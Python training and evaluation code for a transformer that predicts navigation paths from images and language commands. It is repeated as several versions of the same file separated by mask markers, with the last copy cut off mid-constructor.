embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
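    # NoamLR is assumed to implement the warmup-then-decay schedule from
    # "Attention Is All You Need": lr = factor * model_size**-0.5 *
    # min(step**-0.5, step * warmup_steps**-1.5), i.e. linear warmup for
    # warmup_steps batches followed by 1/sqrt(step) decay.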
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
<mask token>
| <mask token>
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # guard the sentinel comparison: the defaults are None, and None < 0
        # raises TypeError in Python 3
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
                score_dict = self.validate(small_batch, epoch, b, 0,
                    self.debug_image_top_k, self.debug_image_threshold)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
        compute the per-patch loss: each patch is labelled 1 if any path pixel falls inside it, 0 otherwise
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
def validate(self, batch_instance, epoch_num, batch_num, instance_num,
top_k, threshold):
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
if __name__ == '__main__':
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
| <mask token>
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self, dataset_reader: NavigationDatasetReader, encoder:
TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:
Scheduler, num_epochs: int, num_blocks: int, device: torch.device,
checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,
resolution: int=64, patch_size: int=8, block_size: int=4,
batch_size: int=16, output_type: str='per-pixel', checkpoint_every:
int=64, validation_limit: int=16, depth: int=7, score_type: str=
'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,
debug_image_top_k: int=None, debug_image_threshold: float=None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[], encoder=encoder, optimizer=optimizer, scheduler=
scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device
=device, checkpoint_dir=checkpoint_dir, num_models_to_keep=
num_models_to_keep, generate_after_n=generate_after_n,
score_type=score_type, patch_size=patch_size, block_size=
block_size, output_type=output_type, resolution=resolution,
depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=
zero_weight)
self.f1_metric = F1Metric()
self.dataset_reader = dataset_reader
self.batch_size = batch_size
self.checkpoint_every = checkpoint_every
self.validation_limit = validation_limit
        # guard the sentinel comparison: the defaults are None, and None < 0
        # raises TypeError in Python 3
        if debug_image_top_k is not None and debug_image_top_k < 0:
            debug_image_top_k = None
        if debug_image_threshold is not None and debug_image_threshold < 0:
            debug_image_threshold = None
self.debug_image_top_k = debug_image_top_k
self.debug_image_threshold = debug_image_threshold
def split_large_batch(self, batch):
large_bsz = batch['path_state'].shape[0]
small_batches = []
for i in range(0, large_bsz, self.batch_size):
small_batch = {}
for k in batch.keys():
small_batch[k] = batch[k][i:i + self.batch_size]
small_batches.append(small_batch)
return small_batches
def validate_one_epoch(self, epoch, step, validation_limit):
print(f'Validating epoch {epoch} step {step}...')
total_prev_acc, total_next_acc = 0.0, 0.0
total = 0
self.encoder.eval()
for b, dev_batch_instance in enumerate(self.dataset_reader.read(
'dev', validation_limit)):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, epoch, b, 0)
total_next_acc += score_dict['next_f1']
total += 1
mean_next_acc = total_next_acc / total
return mean_next_acc
def evaluate(self):
total_acc = 0.0
total = 0
total_block_acc = 0.0
self.encoder.eval()
for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.
read('dev', self.validation_limit))):
actual_batches = self.split_large_batch(dev_batch_instance)
for small_batch in actual_batches:
score_dict = self.validate(small_batch, 10, b, 0, self.
debug_image_top_k, self.debug_image_threshold)
total_acc += score_dict['next_f1']
total += 1
mean_acc = total_acc / total
print(f'Test-time pixel acc {mean_acc * 100}')
return mean_acc
def train_and_validate_one_epoch(self, epoch):
print(f'Training epoch {epoch}...')
self.encoder.train()
skipped = 0
step = 0
for b, batch_instance in enumerate(self.dataset_reader.read('train')):
actual_batches = self.split_large_batch(batch_instance)
for sb, small_batch in enumerate(actual_batches):
is_best = False
self.optimizer.zero_grad()
outputs = self.encoder(small_batch)
if outputs is None:
skipped += 1
continue
loss = self.compute_patch_loss(small_batch, outputs, self.
next_to_prev_weight)
loss.backward()
self.optimizer.step()
it = (epoch + 1) * (step + 1)
self.scheduler.step_batch(it)
if (step + 1) % self.checkpoint_every == 0:
step_acc = self.validate_one_epoch(epoch, step, self.
validation_limit)
print(
f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'
)
if step_acc > self.best_score:
is_best = True
self.best_score = step_acc
self.save_model(f'{epoch}_{step}', is_best)
step += 1
print(f'skipped {skipped} examples')
epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.
validation_limit)
print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')
if self.score_type == 'acc':
return epoch_acc / 2, -1.0
else:
raise AssertionError(f'invalid score type {self.score_type}')
def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,
1.0]):
"""
compute per-patch for each patch
"""
bsz, w, h, __ = inputs['input_image'].shape
pred_next_image = outputs['next_position']
path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()
true_next_image = image_to_tiles(path_state, self.patch_size)
next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)
next_patches = torch.zeros_like(next_sum_image)
next_patches[next_sum_image != 0] = 1
pred_next_image = pred_next_image.squeeze(-1)
next_patches = next_patches.squeeze(-1).to(self.device).long()
pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')
next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,
next_patches)
total_loss = next_pixel_loss
print(f'loss {total_loss.item()}')
return total_loss
def generate_debugging_image(self, true_img, path_state, pred_path,
out_path, caption=None, top_k=None, threshold=None):
caption = self.wrap_caption(caption)
fig, ax = plt.subplots(2, 2, figsize=(16, 16))
text_ax = ax[0, 1]
text_ax.axis([0, 1, 0, 1])
text_ax.text(0.2, 0.02, caption, fontsize=12)
text_ax.axis('off')
props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)
text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,
verticalalignment='top', bbox=props)
img_ax = ax[1, 0]
true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]
img_ax.imshow(true_img)
true_path = path_state.detach().numpy()
true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(
float)
true_ax = ax[0, 0]
true_ax.imshow(true_path)
pred_path = torch.softmax(pred_path, dim=0)
pred_path = pred_path[1, :, :]
pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)
if top_k is not None:
top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]
top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))
pred_path[top_k_inds] = 1.1
pred_path[pred_path < 1.0] = 0
pred_path[top_k_inds] = 1.0
elif threshold is not None:
pred_path[pred_path < threshold] = 0
else:
pred_path = pred_path
pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)
pred_ax = ax[1, 1]
pred_ax.imshow(pred_path)
file_path = f'{out_path}.png'
print(f'saving to {file_path}')
plt.savefig(file_path)
plt.close()
    def validate(self, batch_instance, epoch_num, batch_num, instance_num,
        top_k=None, threshold=None):  # defaults added so validate_one_epoch's four-argument call works
self.encoder.eval()
outputs = self.encoder(batch_instance)
next_position = outputs['next_position']
next_position = tiles_to_image(next_position, self.patch_size,
output_type='per-patch', upsample=True)
next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[
'path_state'].unsqueeze(-1), next_position)
if epoch_num > self.generate_after_n:
for i in range(outputs['next_position'].shape[0]):
output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'
).joinpath(f'instance_{i}')
output_path.mkdir(parents=True, exist_ok=True)
command = batch_instance['command'][i]
command = [x for x in command if x != '<PAD>']
command = ' '.join(command)
image = batch_instance['input_image'][i]
path_state = batch_instance['path_state'][i]
pred_path = next_position[i]
self.generate_debugging_image(image, path_state, pred_path,
output_path, caption=command, top_k=top_k, threshold=
threshold)
return {'next_f1': next_f1}
def compute_f1(self, true_pos, pred_pos):
eps = 1e-08
values, pred_pixels = torch.max(pred_pos, dim=1)
gold_pixels = true_pos
pred_pixels = pred_pixels.unsqueeze(1)
pred_pixels = pred_pixels.detach().cpu().float()
gold_pixels = gold_pixels.detach().cpu().float()
total_pixels = sum(pred_pixels.shape)
true_pos = torch.sum(pred_pixels * gold_pixels).item()
true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()
false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()
false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()
precision = true_pos / (true_pos + false_pos + eps)
recall = true_pos / (true_pos + false_neg + eps)
f1 = 2 * (precision * recall) / (precision + recall + eps)
return precision, recall, f1
def main(args):
device = 'cpu'
if args.cuda is not None:
free_gpu_id = get_free_gpu()
if free_gpu_id > -1:
device = f'cuda:{free_gpu_id}'
device = torch.device(device)
print(f'On device {device}')
nlp = English()
tokenizer = Tokenizer(nlp.vocab)
dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=
args.out_path, path_width=args.path_width, read_limit=args.
read_limit, batch_size=args.batch_size, max_len=args.max_len,
tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,
is_bert='bert' in args.embedder)
checkpoint_dir = pathlib.Path(args.checkpoint_dir)
if not checkpoint_dir.exists():
checkpoint_dir.mkdir()
if not args.test:
with open(dataset_reader.path_dict['train'].joinpath('vocab.json')
) as f1:
train_vocab = json.load(f1)
with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:
json.dump(list(train_vocab), f1)
else:
print(f'Reading vocab from {checkpoint_dir}')
with open(checkpoint_dir.joinpath('vocab.json')) as f1:
train_vocab = json.load(f1)
print(f'got data')
print(f'constructing model...')
if args.embedder == 'random':
embedder = RandomEmbedder(tokenizer, train_vocab, args.
embedding_dim, trainable=True)
elif args.embedder == 'glove':
embedder = GloveEmbedder(tokenizer, train_vocab, args.
embedding_file, args.embedding_dim, trainable=True)
elif args.embedder.startswith('bert'):
embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.
max_len)
else:
raise NotImplementedError(f'No embedder {args.embedder}')
depth = 1
encoder_cls = NavigationTransformerEncoder
encoder_kwargs = dict(image_size=args.resolution, patch_size=args.
patch_size, language_embedder=embedder, n_layers=args.n_layers,
channels=args.channels, n_heads=args.n_heads, hidden_dim=args.
hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout
=args.embed_dropout, output_type=args.output_type,
positional_encoding_type=args.pos_encoding_type, device=device,
log_weights=args.test, locality_mask=args.locality_mask,
locality_neighborhood=args.locality_neighborhood, init_scale=args.
init_scale)
encoder = encoder_cls(**encoder_kwargs)
if args.cuda is not None:
encoder = encoder.cuda(device)
print(encoder)
optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)
scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=
args.warmup, factor=args.lr_factor)
best_epoch = -1
block_size = int(args.resolution * 4 / 64)
if not args.test:
if not args.resume:
try:
os.mkdir(args.checkpoint_dir)
except FileExistsError:
try:
assert len(glob.glob(os.path.join(args.checkpoint_dir,
'*.th'))) == 0
except AssertionError:
raise AssertionError(
f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'
)
else:
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).
joinpath('best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
best_checkpoint_data = json.load(open(pathlib.Path(args.
checkpoint_dir).joinpath('best_training_state.json')))
print(f'best_checkpoint_data {best_checkpoint_data}')
best_epoch = best_checkpoint_data['epoch']
with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),
'w') as f1:
dump_args = copy.deepcopy(args)
del dump_args.__dict__['cfg']
del dump_args.__dict__['__cwd__']
del dump_args.__dict__['__path__']
to_dump = dump_args.__dict__
yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)
else:
print(f'loading model weights from {args.checkpoint_dir}')
encoder = encoder.to('cpu')
state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(
'best.th'), map_location='cpu')
encoder.load_state_dict(state_dict, strict=True)
encoder = encoder.cuda(device)
num_blocks = 1
trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,
encoder=encoder, optimizer=optimizer, scheduler=scheduler,
num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,
checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.
checkpoint_every, validation_limit=args.validation_limit,
num_models_to_keep=args.num_models_to_keep, generate_after_n=args.
generate_after_n, score_type=args.score_type, depth=depth,
resolution=args.resolution, output_type=args.output_type,
patch_size=args.patch_size, block_size=block_size, best_epoch=
best_epoch, seed=args.seed, zero_weight=args.zero_weight,
debug_image_top_k=args.debug_image_top_k, debug_image_threshold=
args.debug_image_threshold)
if not args.test:
trainer.train()
else:
print(f'evaluating')
acc = trainer.evaluate()
print(f'accuracy: {acc}')
if __name__ == '__main__':
np.random.seed(12)
torch.manual_seed(12)
parser = configure_parser()
args = parser.parse_args()
main(args)
| import json
from jsonargparse import ArgumentParser, ActionConfigFile
import yaml
from typing import List, Dict
import glob
import os
import pathlib
import pdb
import subprocess
import copy
from io import StringIO
from collections import defaultdict
import torch
from spacy.tokenizer import Tokenizer
from spacy.lang.en import English
from einops import rearrange
import logging
from tqdm import tqdm
import matplotlib
from matplotlib import pyplot as plt
import matplotlib.patches as patches
from matplotlib import gridspec
import numpy as np
import torch.autograd.profiler as profiler
from torch.nn import functional as F
from torch.optim.lr_scheduler import StepLR
from allennlp.training.scheduler import Scheduler
from allennlp.training.learning_rate_schedulers import NoamLR
import pandas as pd
from transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image
from metrics import MSEMetric, AccuracyMetric, F1Metric
from language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder
from navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser
from train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer
from navigation_transformer import NavigationTransformerEncoder
from train_transformer import TransformerTrainer
logger = logging.getLogger(__name__)
class NavigationTransformerTrainer(TransformerTrainer):
def __init__(self,
dataset_reader: NavigationDatasetReader,
encoder: TransformerEncoder,
optimizer: torch.optim.Optimizer,
scheduler: Scheduler,
num_epochs: int,
num_blocks: int,
device: torch.device,
checkpoint_dir: str,
num_models_to_keep: int,
generate_after_n: int,
resolution: int = 64,
patch_size: int = 8,
block_size: int = 4,
batch_size: int = 16,
output_type: str = "per-pixel",
checkpoint_every: int = 64,
validation_limit: int = 16,
depth: int = 7,
score_type: str = "acc",
best_epoch: int = -1,
seed: int = 12,
zero_weight: float = 0.05,
debug_image_top_k: int = None,
debug_image_threshold: float = None):
super(NavigationTransformerTrainer, self).__init__(train_data=[],
val_data=[],
encoder=encoder,
optimizer=optimizer,
scheduler=scheduler,
num_epochs=num_epochs,
num_blocks=num_blocks,
device=device,
checkpoint_dir=checkpoint_dir,
num_models_to_keep=num_models_to_keep,
generate_after_n=generate_after_n,
score_type=score_type,
patch_size=patch_size,
